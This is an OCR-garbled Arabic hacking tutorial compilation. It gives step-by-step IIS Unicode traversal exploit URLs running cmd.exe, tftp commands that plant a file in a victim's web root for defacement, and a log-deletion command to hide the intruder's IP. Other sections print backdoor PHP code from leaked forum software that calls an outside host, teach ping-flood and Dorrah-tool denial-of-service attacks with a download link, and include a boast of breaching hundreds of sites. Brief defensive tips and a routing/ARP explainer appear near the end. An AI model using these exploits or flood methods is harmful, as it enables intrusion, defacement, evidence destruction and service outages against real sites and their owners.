‎١‎‏-ثغراتالهتمل 

‎٢‎‏-الفرون تبیج 

٧٤




-٣ 

IIS 

مخلفاتالافتبي والاستفاد منهكثیرلهكرز 

‎٤‎‏-ثغراتالبرامج 

٥- عدمتمكن حمایةالنظام‎100%‎ 

لاذلكانصحالاخوهبالابتعاد عن سرفرا تالویندوز وبرامجهم 

بدایةنعر ف ماهي 

هي خدمه متواجدةفي ویندوزالفینبروفشنال وویندوزانتيIIS ال 

‏...‏IIS5.0‎وویندوزالفین یمتلك الاصدارةالخامسة من ملقممعلوماتالانترنت 

بسماالله نبدأ 

توجد نقطة ضع ففيالاياياس ‎٤‎او ٥ وهذهالنقطةتستغلبطریقة سهلة جداً‏ 

وتسمى هذه النقطةبالیونیكود 

وتنفیذها سهلاً‏ لایحتاجالى خبرة عمیقةفي مجالاختراق المواقع 

ولكن نق ف عند هذه النقطةللمبتئیدئن 

المبتدئین عامةً‏ یفكرونالانفياختراق عدة مواقع شهیرةبهذهالطریقة 

ولكن لا هذهالطریقة غیر مجدیة معالمواقع الشهیرةاو غیرالشهیرة 

لان نقطة الضع ف هذهلاتوجدالافي ویندوزالفیناوانتي 

وأغلبالمواقعالشهیرةتستخدمانظمةالیونكس واللنكس 

أيان ویندوزانتي اوالفین نظام حمایته محدودة وكل یومتطلعثغرات جدیدة 

لكنبوسع مدراءالمواقع ایقا ف نقطةضع ف من نقاطالاضعا ف الموجودةفيالانتي 

لكن بتلكالطریقةقد یكونونجعلو حاجزاًلهم منالهكرة 

ولكنلیس دائماً‏ 

وتنفذ من داخلالمتصفح 

وطریقةتنفیذالثغرةكالاتي 

: 

../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.com/scripts/..Á 

ركزوهناالان بعد دوتكومبدأ تتنفیذ الثغرة 

وبإ مكانكأیضا دخولاي مل ف ولیسفقط رؤیة السي:‏c هذهالثغرةتسمحلكب عر ض جمیع ملفات 

وتوجدأكثر منثغرة وهي 

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 



/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system 

32/cmd.exe\?/c\+dir+c:\ 

٧٥




: 

وطریقةتنفیذها من المتصفح 

ومكانتنفیذها بعداسمالموقع 

مثال 

http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/? /c \+ 

أي بعد دوتكوم 

بع ضالناس یسألون مالذي یظهراو علىاي شكل یظهر 

الحلبسی ط 

Dirهذاالامرلوقمت بكتابتهفي نافذة الدوس ستظهرلكالملفات 

وطریقة ظهور الملفاتفيالمتصفحتقریبا 

بنفس طریقة الدوس 

إ ذا نجحتفيتنفیذ الثغرة واظهرتالملفا تامامك فتبدأفيتنفیذالخطوةالثانیة 

الخطوة الثانیة عملابلودللمل فالذيتریدتحمیله 

وعمل الأبلودأیضاً‏ لایحتاج الى خبرة 

لكن هنالكشروطلكيتعملابلود 

یجب التأكد منأن التيإفتيبي مثبت علىالموقعالض حیة 

وللكي تتأكدإتبعالاتي 

یجب الدخول على مل ف السستم‎٣٢‎ ولكيتد خله یجبأنتضی ف بع ض الكلمات علىالثغرةالتي نجحتفي 

تنفیذها 

مثال : 

../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.com/scripts/..Á 

هذه الثغرة عملتفيالموقع المطلوب ورأیت الملفات 

لاحظالتغیر 

http://www.xxxxxx.com/scripts/..Á 

../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\ 

ماوضع علىالثغرة هوأسماءلملفات متواجدة داخل الویندوز Winnt\Sytem32\ 

أي یجب علیكالدخول على هذه الملفاتلكي تتأكد 

بع ضالقراءیتسالون ‏.....الثغرةالتي نستخدمهالیست متطابقة 

للتطابقها یجب علیك الدخولبايكان على ملل ف السستم 

ممكن یكوناحدالقراءاشتغلتمعاه هذه الثغرة 

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\ 

ویقولكی فادخل على مل فالسستم 

الحل هو واحد یجب علیكإ ضافةاسماء الملفاتلكيتدخل علىالسستم‎٣٢‎ 

اي بعد هذاالامتداد 

‏\:‏c+dir+cهناتضی فأسماء الملفات 

http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/ 

كماقلنا سابقاَلاتحتاج الى خبرة 

وبعد دخول مل فالسستم ستظهرلك محتویاته 

ویجب على آنذاك الب حث عنبرنامج یسمي 

tftp.exeیعني دور على هذاالبرنامجالین ماتلقاهوتتأكد منانهفيالجهاز 

لان هذاالبرنامجیعتبر شرطلكيتعملابلودللصفحة 

ولولقیتالبرنامج اتفاءلبالخیریعنيبإذنااللهتعبك ماهو رایح على الفاضي 

مع هذه الثغرة ولكن هذالیس شرط 

٧٦




C:\ 

......................................................................................... 

والشرطالثاني هو 

یجبأن یكون عندكبرنامجالتيإ فتيبي 

وهذا البرنامجتقدرتنزله من هذا العنوان 

www.geocities.com/anorR1234/tftpd32.zip 

‏\:‏Cوبعد ماتنزل البرنامجوتفكالضغط منه منالافضلإنكت حطه داخلال 

وتحطأیضا البرامجأو الصفحةالتيتریدأنتعمللهاأبلودفيالسي 

ت حطهفيالسي الى داخل جهازك مو الى دالخل الموقع 

وتشغل البرنامج 

tftp32.exeوتتركهیعملالىأنتنتهى من مهمتكالأساسیة 

أسمعكلامي وحطكل شيفي 

لأنكلو حطیتهابإذناالله را حتنجح المهمه 

----------------------------------------------------------------- 

الانبدأنافي النقطةالخطرة وهيتحمیلالملفات 

مع العلمأنياقصدبالتحمیلالابلود 

أي 

أبلود ‏=تحمیل 

موتجمیل 

وتحمیلالملفات طریقةمعقدة نسبیاًبسأنا متفائلبالخیرلأنيمعتقدأنكم راحتفهمو 

المهم نرجعلموضوعنا 

المهم طریقة نسخالملفاتتضا فایضاً‏ الىالمتصفح 

وتضا فبهذه الطریقة 

: مثال 

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+ c : \ 

تخیل الثغرة هذهاشتغلتمعاك 

ویجب علیكإنكتمسح بع ضالإ ضافات من الثغرةلكيتضی ف امرالنسخ 

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm 

یعني الى راح نمسحه منالثغرةبیكون هذهالاضافة 

/c + dir+c:\ 

عشانتظی فبدالها 

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm 

ولمن نظی فامر النسخ بیطلعلنابهذا الطریقة 

"-http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+ 

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm 

شایفین یاشبابإ شالى اتغیر 

بس لازمأیضاًإنكتغیراللازمفيأمرالنسخ 

مثل 

tftp.exeهذا سیبهفي حاله لانهاسمبرنامج التيا فتيبي الى حاطهفي السي ومشغلهالان 

"i - ‏"هذابرضه سیبه لانه مهم 

‎1.1.1.1‎هنابدالالارقام هذاتكتبالایبيتبع جهازك وعشان تتأكد منالایبيلمنتشغبالتيا فتيبي 

راح یطلع ایبي وهذاالایبيالى طلعلك هوالىتكتبه 

GETهذهالاضافة سیبهافي حالها لانهاتعتبر شرطفي نسخ المفات 

٧٧




index.htmهذهاسمالصفحة الى راح تتحمل وممكنتغیرها عاد بكیفكانت 

‏\‏C:\inetpub\wwwrootوهذا مكانتواجدالصفحةالرئیسة الخاصةبالموقع 

index.htmهناتكتبإسمالصفحةاوالمل فالتيتریدهأن یظهرفيالموقع 

‏\:‏Cیجبالتأكد منإنك حاطالصفحة المرادتحمیلهافي جهازك داخلال 

index.htmومثلااسم الصفحة 

قبل ماتضغطانتر عشانتنسخالمل فتاكد منان الثغرةالان صارت مشابهالمثل هذه الثغرة 

"-http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+ 

i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm 

ولو طلعت مشابهالهااضغ ط إنتروتوكل علىاالله 

وبإذناالله راحیتنسخ المل ف 

------------------------------------------------------------------------------------------------------ 

-------------------------------------------------------------------------------- 

وفى النقطةالا خیرة والاهم 

مسح ملفاتتكونتجمعت داخل الجهاز ومكونة معلومات عنك مثلالایبي 

http://server/msadc/..À¯../..../c+del+c:/*.log 

-------------------------------------- 

************************************************************************************** 

‎٥‎‏-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

اولاكماقلنالماذا لایخترقوا منتدیات جون ر غ مثغرات موقعه ‎١‎لانه یستخدم نسخه نضیفه 

‎١‎‏-النسخه الموجودبالنت ملیانثغرات وعارفین جید مصمممي المنتدي لاماذا ینشرونه اذا$‏ 

النسخهتجریبي ومحتويكود التبلیغ لاكيلو نفذت ومسحتكودالتبلیغلنتهرب منثغراتهلوتشغل 

فكركلكشفتهبنفسك 

٢ ‏-انه جمیعه نسخهتجریبي لترویجبضعتهمبدلاانتكونلمدة ‎٣٠‎یومافهمتموني 

‎٣‎‏-النسخهالامنتشرهبالانترنت هو نسخه نحصل علي من مواقع هكرز صح وینكانت من هكرزالغرب 

وحیلهم 

لوتمكنتفي ال حصول علي نسخةالشركة ١٠٠% ونسخه منتشرهفيالنتلرئیت صحقاموابحذ فكود 

التبلیغ منهبلاضافواالیهكوداد وبلاويوثغرا ت-وبعدین یجيالا خ صاحب النسخه یوكدانهلقيثغرة 

بمنتدیات جون 

والعالم ینده شكیییییی ف خلا صانشهر موقعه وسعراعلاناتهارتفعفي موقعهلكثرالزوار 

الحقیقة هو نفسهاضا ف الكود ونفسهیعر ف مكانه وكیفةالعبفیه واالله هكذاالامور 

المعربینالعربلیسوااقل نذلا من الاجانب 

انصحكم بتعریب نسخكمباانفسكم 

٧٨




قبل فترهبسیطهتم اكتشا فثغرهفي بع ض نسخ ‎٢٫٢٫٥‎المسربهلنا مناخوانناالعرب وكان هذاالكود 

الموجودفیهافي مل فforum 

PHP: 

-------------------------------------------------------------------------------- 

if ($action=="modify") { 

$vbxh = h; 

$vbxt = t; 

$vbxp = p; 

$vbxw = w; 

$vbxa = a; 

$vbx1 = 1; 

$vbxr = r; 

$vbxb = b; 

$vbxn = n; 

$vbxe = e; 

$vbxo = o; 

$vbxy =y; 

$vbxl = l; 

echo ""; 

-------------------------------------------------------------------------------- 

وكان الكودال حلو هذایتصلفي موقع 

http://www.arab1.net/ 

http://www.arab1.net/~royal/.x.php?h= 

$HTTP_HOST&h2=$SCRIPT_NAME 

عموما معالایام نزل ت نسخه ٢٫٢٫٦ وسربوهالنا حبایبنا وشالواكودالتبلیغ یاعیني علیهم عشان ی حطون 

لناكودتجسس ونعمالاخوه العربالمسلمین 

بس هالمرهالكوداذكى ومهو مكشو ف وغبي زيالاولالكودالمره هذيفي ملفین ملف optionبالاخیر 

موجود 

PHP: 

-------------------------------------------------------------------------------- 

echo "




echo " -->"; 

-------------------------------------------------------------------------------- 

ومل فfunctions 

PHP: 

-------------------------------------------------------------------------------- 

$sqlupdate = 

base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9 

5YWwvLngyLmluYw=='); 

-------------------------------------------------------------------------------- 

یاعیني علىالذكاء صرنانعر ف نلعبباكدوا دیكود وانكود والمره هذي بعدیتص ل الكود ال حلو هذااللي 

مستخدمینفیه دیكودبالموقع هذا 

. 

http://saudi.no-ip.com/ 

بیرحبفیكم ویقولكمarab1.net WELCOME TO 

http://saudi.no-ip.com/~royal/.x2.inc الليفیهاكود 

یاعیني عالترحیب 

عموماالكودبیتصلبالصفحه هذي 

رهییییییب ویبینلنا ‏.......اللي ی حسبون علیناكمسلمین وعرب 

شوفو الكود 

PHP: 

-------------------------------------------------------------------------------- 

 




$file = fopen("$open", "r"); 

$rf = fread($file, 1000); 

fclose($file); 

?> 

--> 

 

واخرهكان دار العربفي ملفه هوبیعر ف 

************ 

‎٦‎‏-الحمایه منالمخترقینبنسبة ٨٠% لااجهزتكم ومنتدیاتكم 

یااللهكل یوم نسمعاختراق المنتدیاتالیكم الحل 

حمایة‎٨٠‎‏%الیكماسباباخترقه وحمایته 

- ١ وجودثغراتبمجلدالادمن 

-٧ 

-٨ 

٧- 

‎٢‎‏-ثغرة مجلد مود 

‎٣‎‏-ثغرةالاستیل 

‎٤‎‏-الهتمل 

‎٥‎‏-كوكیز 

‎٦‎‏-دعم التلنت 

علىالمجلد ویندوزC:\Windows Cfgwiz32.exe 

من المل فmisc 

٩- وجودبات شبجهازكتمارسلهلك منقبل المخترقل حصولبمعلوماتك 

************************************************************************************** 

‎٧‎‏-كیفیةالحمایة 

^^^^^^^^^^ 

‎١‎‏-قمبحمایة مل فالادمن جیدا .htaccess شغلفقطفي سرفراتالینوك سلیس ویندوز 

‎٢‎‏-قمبحمایتهhtaccess‏.‏ 

٣- لاتركب ستیلاتكثیر یسبببثغرةباالمنتدي 

٤- لاتفعللغةالهتملابدا 

‎٥‎‏-احذر منالكوكز نظ ف جاهزك دائما 

‎٦‎‏-قم بتوقی ف التل نیتلموقع عندمالاتحتاجه 

نأكد من عدم وجود مل فباسم Cfgwiz32.exe علىالمجلد ویندوزC:\Windows 

٨- دهبلووووويالدنیافیه جاري الب حث عن حلله 

‎٩‎‏-قم بتركیببرامجالفیروسا تبجهازك … 

٨١




‏"مصطلحات مهمة للمبتدئين في اختراق المواقع"‏ 

$$$$$$$$$$ 

الكاتب : علي زائر 

$$$$$$$$$$ 

سنعرجفي هذا الموضو ع على مصطلحات وأمورهامة یجبانتعر ف علیها سویاقبلالبدء 

======================================================= 

تلنت -:(Telnet) و هوبرنامج صغیر موجودفيالویندوز . و هویعملككلاینت 

أو وضعیتهتكون دائما كزبون ‏.أيأنباستطاعة هذاالبرنامجالإتصالبالسیرفر 

أوالخادم واجراء بع ضالعملیاتكل حسب مستواها و حالتها ‏.یستخدمه الهكرزد غالبال لإتصالبالسیرفر 

عبربورتمعین و خصوصابورتالإفتيبي ) ‎٢١‎‏)للدخولالىالموقعبطریقة خفیة 

Anonymous Mode لعر ض ملفات الموقع و سحب مل فالباسورداو غیره منالبیانا ت.‏ 

لاستخدامالبرنامج ‏،اذهبالى 

Start ==> Run ==> telnet و ستظهر شاشةالتلنت . 

------------------------------------------------------------------------ 

برامج السكانأو -:Scanner و هيبرامج موجودةللمسح علىالمواقع وكش ف 

ثغراتهاإن وجدت ‏،فهي سریعة،كماأنهاتملكقاعدةبیانات واسعة وكبیرة 

تحتوي علىالثغراتأوالاكسبلویت ‏(‏Exploits‏)التيیتمتطبیقها علىالموقع 

لرؤیةفیمااذاكانالسیرفریعاني مناحد ى هذهالثغرا تأم لا . و منأمثلة 

هذه البرامج،برنامج 

الخ 

برمجةالأ خ عمران 

ولهذهالبرامجأنوا ع مختلفة ، منهاالتيتقوم بعمل سكان على نظامأو سیرفر 

معین مثل البرامجالمختصةبالسكان على سیرفراتال IIS و منهابرامج المسح 

علىثغرات السي جيايفقط CGI و ماالى ذلك 

Shadow Security Scanner و Stealth و 

. Omran Fast 

. 

----------------------------------------------------------------------- 

وهذاالبرنامجا لعربي من 

اكسبلویت -:(Exploits) هيبرامجتنفیذیةتنفذ من خلالالمتصفح . ولها عنوانURL ‏،تقوم هذه 

الإكسبلویتات بعر ض ملفاتالموقع وتقوم بعضهابالدخول الىالسیرفر و التجولفیه ‏،كماتوجد 

اكسبلویتاتتقومبشن هجوم علىبورتمعینفيالسیرفر لعملكرا شله ، و هذا ما یسمى ب 

Buffer 

. Over Flow Exploits 

Unicodes و منهاال CGI Bugs CGIأوال Exploits 

Exploits و منهاال ، Exploits ، Buffer Over Flow و منهاال PHP Exploits ‏،و منها 

هناكأنوا ع منالإكسبلویت ‏،فمنهاال 

الExploits DOS والتيتقوم بعملیة حجبالخدمةللسیرفرإن وجدفیهاالثغرةالمطلوبةلهذاالهجوم 

وانلم یكن علىالسیرفرأيفایروول . Fire Wall و هناك بع ضالإكسبلویتات المكتوبةبلغة السي و 

یكون امتدادها 

هذهالإكسبلویتاتبالذاتتحتاجالىكومبایلر Compilerاوبرنامجا لترجمتها وتحویلها الىاكسبلویت 

تنفیذي عادي یستخدم من خلالالمتصفح،‏ و لتحویلالإكسبلویت المكتوب بلغةالسي هذه الىبرنامجا 

تنفیذیا ، نحتاجإماالى 

نظامالتشغیللینوكساو یونكس ‏،او الىايكومبایلریعمل ضمن نظامالتشغیل ویندوز ‏.أشهر هذه 

الكومبایلرس ‏(المترجماتأوالمحولات ‏)برنامجاسمه 

نظامالتشغیل ویندوزكما ذكرنا سابقا.‏ 

---------------------------------------------------------------------- 

Borland C++ Compiler و هيتعملتحت 

. (c.) 

٨٢




الجدارالناري -:FireWall هيبرامجتستعملهاالسیرفراتلحمایتها منالولوجالغیر شرعيلنظام 

ملفاتها منقبلالمتطفلین ‏.هيتمثل الحمایةللسیرفر طبعا ، ولكنيأنوه بأن الفایروولاتالمستخدمة 

لحمایةالسیرفرات ‏(المواقع ‏)تختل ف عنتلك التيتستخدملحمایة الأجهزة 

. 

---------------------------------------------------------------------- 

-:Token هو مل فالباسورد المظلل Passwd) (Shadowed و الذي یكونفیهالباسورد 

على شكل ‏*أو xأي Shadowed ‏.إن وجدت مل ف الباسورد مظللا ‏،فیجب علیك حینها الب حث عن 

مل فالباسوردالغیر المظلل و الذي یسمى 

---------------------------------------------------------------------- 

Anonymouse‏:-هيالوضعیةالخفیة والمجهولة التيتدخلفیهاالىالموقعالمراد اختراقه.هناك 

خاصیةفيبرامجالا فتيبيبنفسالإسم ‏،تستطیعانتستعملهافي الدخولالمجهول الىالسیرفر و 

سحبالملفات منه وهذهأصبحت نادرة نوعا ماالآن 

---------------------------------------------------------------------- 

Valnerableties‏:-أي الثغراتأو مواضع الضع فالغیر م حصنةأو القابلةللعطب و التيیعاني منها 

السیرفر والتيقدتشكل خطراأمنیا علیه مما یؤديالىاستغلالها منقبل الهاكرزفي مهاجمةالسیرفر و 

اختراقهأوتدمیره 

ما هي مفردها ؟ ، Valnerableأيثغرةأوبالأصح موضعالضع ف والمكانالغیر مؤمنبشكل سلیم 

. وتكثر هذهالكلمةفي القوائمالبریدیةللمواقعالمهتمةبالسیكیوریتي وأمنالشبكات و غیرهاكالقائمة 

البریدیة الموجودةفي موقع Securityأوباقتراكاو Focus غیرها 

. etc/shadow/ 

. 

Shadow file ‏.تجدهفي 

. 

. 

(: 

---------------------------------------------------------------------- 

passwd file 

‏:هوالمل فالذي یحتوي علىباسورد الروت وباسوردات الأشخا صالمصرحلهم 

بالدخولالىالسیرفر ‏.باسوردالموقع موجودفي نفسالمل ف طبعا و غالبا ما یكون مشفر وبمقیاس DES 

. 

---------------------------------------------------------------------- 

الجذرأو ال : root وهو المستخدم الجذري والرئیسيللنظام ‏،لهكلالصلاحیاتفي التعامل مع ملفات 

الموقع والسیرفر منإزالةأواضافةأوتعدیلللملفات.‏ 

غالبا ما یكونباسورد الروتهوباسورد الموقع نفسهفيالمواقع التيتعمل ضمن نظامالتشغیللینوكس 

و غیرها 

او یونكسأو سولاريأو 

. Free BSD 

---------------------------------------------------------------------- 

السیرفر Server ‏:هوالجهازالمستضی فللموقع ‏،اذأنكل ملفاتالموقعتوضعفیهفهو جهازكمبیوتر 

عاديكغیره منالأجهزةلكنه ذوامكانیات عالیةككبر حجمالقر صالصلب والرام والكا ش میموري و 

سرعته الهائلة ، و هو متصلبا لإنترنت ٢٤ ساعة ، و هذا هو سببكون المواقع شغالة ٢٤ ساعة على 

ا لإنترنت :) ‏.قد یستضی فالسیرفرأكثر من موقع واحد،‏ و هذایعتمد من سیرفر لآخر و من شركةلأخر ى.‏ 

ضربة الهاكرز طبعاهياختراقالسیرفر الذي یملكالكثیر من المواقع ‏،فیسهل حینهااختراق جمیع 

المواقع التيتندرجتحته مما یؤديإما الىتدمیرهاأو العبثفي ملفاتهاأوتشویه واجهتهاأو سرقة 

بیاناتها وتدمیرهاأو مسحها منالنتتماما ، و هذا ما یحد ثللمواقعالإسرائیلیة و بكثرة و اللهالحمد 

- . 

جزاكماالله خیراأیهاالمجاهدون وأذكرانيفيأخر مرةاخترقت سیرفر یحتويقرابة ٣٦٧ موقع وحصلت 

على جمیع ملفاتالكونفیج الموجودة داخلالسیرفر وفیها طبعاالباسورداتبدون تشفی ركمانعلم وهي 

الخاصةبمجلاتالنیوك وكذلكالخاصةبالادمنلبرامج المنتدیات والبقیة من خلال فتحتشفیرالباسوردات 

ببرنامج جونتستطیع مباشرة مناختراق الموقع منالا فتيبيبلا عناء وحذ فكل مافیه 

. - 

----------------------------------------------------------------------- 

٨٣


) Flow ( Buffer over : وهي نو ع منأنوا عالاكسبلویتاتالتيتستعمللشن هجوم 

. 

بوفرأوفرفلو 

الطفح على نقطةمعینة منالسیرفر مثل الهجوم علىبورتالإفتيبيأو غیرهلأجلاضعا ف اتصال 

السیرفر وفصل اتصالهبهذابهذاالبورت و لالغاءالرقعةالموجودةبهاكيیتماستغلالها مجددا - بعد عمل 

الكرا شلها طبعا ‏-یتماستغلالهافيمعاودةالإتصاللها وبسهولة و دون وجودأي رقعاو حواجز و 

سحبالبیانات منها 

و هي شبیهة نوعا ما بعملیة حجبالخدمة ‏-اذأنهاتقوم بعملیةاوفرلود على جزء مركز من 

DOS - 

السیرفر ... 

٨٤


داینامیكیة تدمير المواقع 

" 


" 

. 

$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$ 


-٢ 

یعدتدمیرالمواقع من الأشیاء السهلة والنافعة والتي یصحبها خساا ئرفادحةللموقعالمستهد ف 

حیثاذاتمتدمیر الموقع وایقافه عنالعمل حتىلولمدة محدودهفسیخسرالموقع خسائربالأ فاو 

بالملایین وعلى حسب شهرةالموقع 

وتدمیر المواقع لایتمالا بأشتراك مجموعةكبیره لاتقلفيأغلبالأحیان عن ٢٠٠ شخ صأوأكثر 

وكلماكثرالعددكلماتمتدمیرالموقعبسرعةأكبر وفي وقت أقصر وهناك مواقعكثیرهتقومبمثل هذاالأمر 

منهاالموقعالمكافح الناصرللأ سلام موقع الجادالألكتروني الذيتعر ضلوق ف طالت مدته وعاد بعد ذلك 

بقوهاكبر ولایزال الموقع مستمرفي هذه الهجمات والجهاد وقدتمتدمیر موااقعكثیره عن طریق 

التعاون مع هذاالموقع .... 

وألیةتدمیرالمواقعتكمنفياشاء عدة منها : 

استخدام الطرقالتقلیدیةالتي تتم عن طریق الدوسكما سیتمالشرح لاحقاان شاءاالله.‏ 

استخدام بع ض البرامجالقویه والفاعلة التي اثبتت جدارتهاامام المواقعالمعادیة مثلبرنامجالدرة 

الشهیر.‏ والذي سیتم شرحه لاحقاان شاءاالله...‏ 

٨٥




$$$$$$$$$ 

م ن ق ول 

$$$$$$$$$ 

" 

شرح برنامج 

الدرة لتدمير المواقع 

" 

حملالبرنامج من عملیةبحثبواسطة ملكالبحث جوجل.‏ 

عند ا لإنتهاء منتحمیلالبرنامج ‏،فك ضغ طالمل ف ، و عندتشغیله سیظهرلكالشكلالتالي 

: 

لبدء الهجومفقطإ ضغط على 

ولإیقا فالهجومإ ضغط على 

عندبدءالهجوم سیعملبرنامجالدرة علىبح ثالبروكسيالخا صبك و سیضعهلكفي مكانه.‏ 

و لتخفيهویتك عند الهجومقم بتشغیل:‏ 

٨٦




و ضع رقمالبروكسيالتالي 

وسیكون عنوان الموقع المراد الهجوم علیه هنا 

و من خوا ص هذا البرنامجانه لا یستطیعاحدتغییر جهة الهجوم ولتجدید عنوانالموقعالمرادالهجوم 

علیهفقطقمبضغط وهو سیقومتلقائیابالبح ث والتغییر.‏ 

ولمعرفة آخراخبارالبرنامج والمواقع التيتمالنجاح بقصفهافقطقمبضغط 

: 

و سیظهرلكالشكل التالي 

: 

قمبضغط 

و ستظهرلكالأخبار . 

و لعملالبرنامجبطریقة ذكیةب حی ث لا یبطيء ا لإنترنت ‏،قم بتشغیل 

: 

٨٧




لتشغیلالبرنامج عند عمل الوندوزقم بتشغیل:‏ 

الشكل التالي یمثل عدد المراتالناجحة 

و هذا یمثل عددالمرات الفاشلة 

: 

: 

وصلةتحمیلالبرنامج .. 

http://www.geocities.com/boom_q8y4/dorrah.zip 

… 

٨٨


تدمير المواقع بدون برامج 

" 


" 

$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$ 

في هذا الدرس سأقومبشرح عدة طرق لتدمیر المواقعبدونبرامج ولكن هناك شرط لتدمیرهاأن یجتمع 

عددكبیرقد یصلفي بع ض الأ حیان الىاعلى من ٢٠٠ شخ ص علىالموقع نفسه ویقوموا بتطیقالطریقة 

معا بع ضفي نفسالوق ت...‏ 

الطریقة الأولى::‏ 

قمبالتوجهإلى 

" الدوس"‏ ===>== اكتبالأمرالتالي ‏: 

یعنياسمالموقع 

بعد ذلك سیخرجلك رقمأيبي الموقع.‏ 

قم بكتابةالأمر:‏ 

Ping www.xx.com 

Xxx 

‏(اسمالموقع)‏ ‏(قوةالضربه)‏ I- ‏(عددالضربا ت)‏ ping n- 

مثال ذلك : 

الطریقةالثانیة::‏ 

بعداستخراج الأيبيتبعالموقع المرادبالطریقةاليفي الأعلى...‏ 

قم بكتابةالأمر:‏ 

ping -t ip 

حیث ipیعنيأيبيالموقعالموراد....‏ 

ping -n 1000 -l 400 www.xxx.com 

٨٩



" Routing in the Internet 

www.3 asfh.com/vb 

" 

معلومات عن 

..... 

$$$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$$$ 

موضو ع هاملنقطة هامةفيالشبكات واوداناضیفاضافةبسیطة وهيانالروتیر هو جهازللتوصیل 

بین عدة شبكات متباعدة (( ولمنیعر ففكرةالخب HUBفال Router یقومبنقس المهمة وهو جهاز 

یختل ففي حجمهباختلا ف المساحات اليیعملفي نطاقها وقدقمت بزیارةلبع ض شركاتمزوديالخدمة 

عن طریق بع ضالاصدقاء ورایت عدة راوترات وبعدةاحجام واستطیعاناقولبان متوسط حجمهتقریبا 

٥٠ سم على شكل مكعب 

٤٠ سم * 

Routing in the Internet: 

=================== 

what is routing?! 

الروتنج هو عباره عن طریقةمعینة والتي عن طریقهاتنتقلالمعلومات منكمبیوترالىاخراو من هوست 

الىاخر.‏ 

وفى سیاقالانترنت یوجدثلا ث مظاهر منالروتنج وهم:‏ 

Physical Address Determination -١ 

Selection of inter-network gateways -٢ 

Symbolic and Numeric Addresses -٣ 

ویعتبرالاولهو المهم فعندماتنتقلبیاناتال ip منالكمبیوتر.فمن الضرورىان نغل ف هذهالبیانات 

الخاصهبال ip بأىأطار مناى صیغهتكون متصلهبالشبكةالم حلیهللجهازاوبالشبكة المتص لبها 

الجهازفى حالتهالموجود علیها عندانتقال هذهالبیانا ت.‏ ویتطلب هذا الغلا فالتضمین من عنوانالشبكة 

الم حلیهاو العنوانالفیزیائىلهذا الشبكه مع الاطارالذى ی حیطبالبیانات ا ى (inclusion of a local 

network address or physical address within the frame). 

. 

و الشئالثانى من المذكوراعلاه مهمایضا و ضرورىلانالانترنت تتكون من عدد منالشبكاتالم حلیة 

مرتبطةبواحداوأكثر منالمداخلاىال.‏gateways و هذهالمداخل عموما 

احیانا یكونلها اتصالا تفیزیائیهاوبورتات مع الكثیر من 

تسمىبالروترسا ى 

الشبكات ‏.وتحدیدالمدخل الملائم والبورت لتفصیلبیاناتالip هذا ما نسمیه روتنجاى routing و 

تتضمنایضا داخلتبادلالمعلوما تبطرقمعینه 

اى local networks 

ال,‏ routers 

والثالث منالمذكورهوالذ ىیتضمنانتقالالعنواناىال address translation منالشكلالكتابى 

الذ ىنعرفه و نستطیع التعر ف علیهبسهوله والمقصود مثلا عنوانالمتصفحا ى 

http://www.3asfh.com/ الى ip ا ىالى اشیاء رقمیهمعقدهصعبه وتؤد ى هذهالمهمه عن طریق 

الDNS 

٩٠



Physical Address اى : 


والان ندخلفى شرح عملیهتحدید ال 

Physical Address Determination: 

=============================== 

. 

اذاكان یرید جهازكمبیوتران ینقل ip data اذنفأنه یحتاجالىان یغل ف بأطار مخص ص وتابعللشبكة 

المتصلالجهازبها.‏ ولنجاح هذاالانتقالفى ظ لالتغلی فبهذاالاطار من الضرورىان نحدد ما یسمىبال 

physicalلأتجاهالكمبیوتر.‏ address و هذایتمبنجاح و ببساطه عن طری قاستخدام جدول سو ف 

یوضحكیفیهتحویلال ip الى , addresses physicalفمثلا هذاالجدول یحتوى على عناوینال ip 

للشبكة اوالعنوان المعرو فلها 

ولل حصول على هذا الجدول وقرائته منالطبیعىان یكونالكمبیوتر یستخدمبروتوكولمعینلل حصول 

على هذا الجدول وتحویلال ipالى physical addresses و هذاالبروتوكولیعر فبأسم ARP اى 

Addressاىبروتوكولت Resolution Protocol حلیل العنوان واعتقدانناالانادركنا وفهمنا 

معنىكلمهتحویلال ipالى , addresses physicalو یمكناننعر ف هذاالجدول بأسم ARP 

cache . 

ولل حصول على الجدول نستخدمامر arp a- وفىالیونكسایضا نستخدم نفسالامر.‏ 

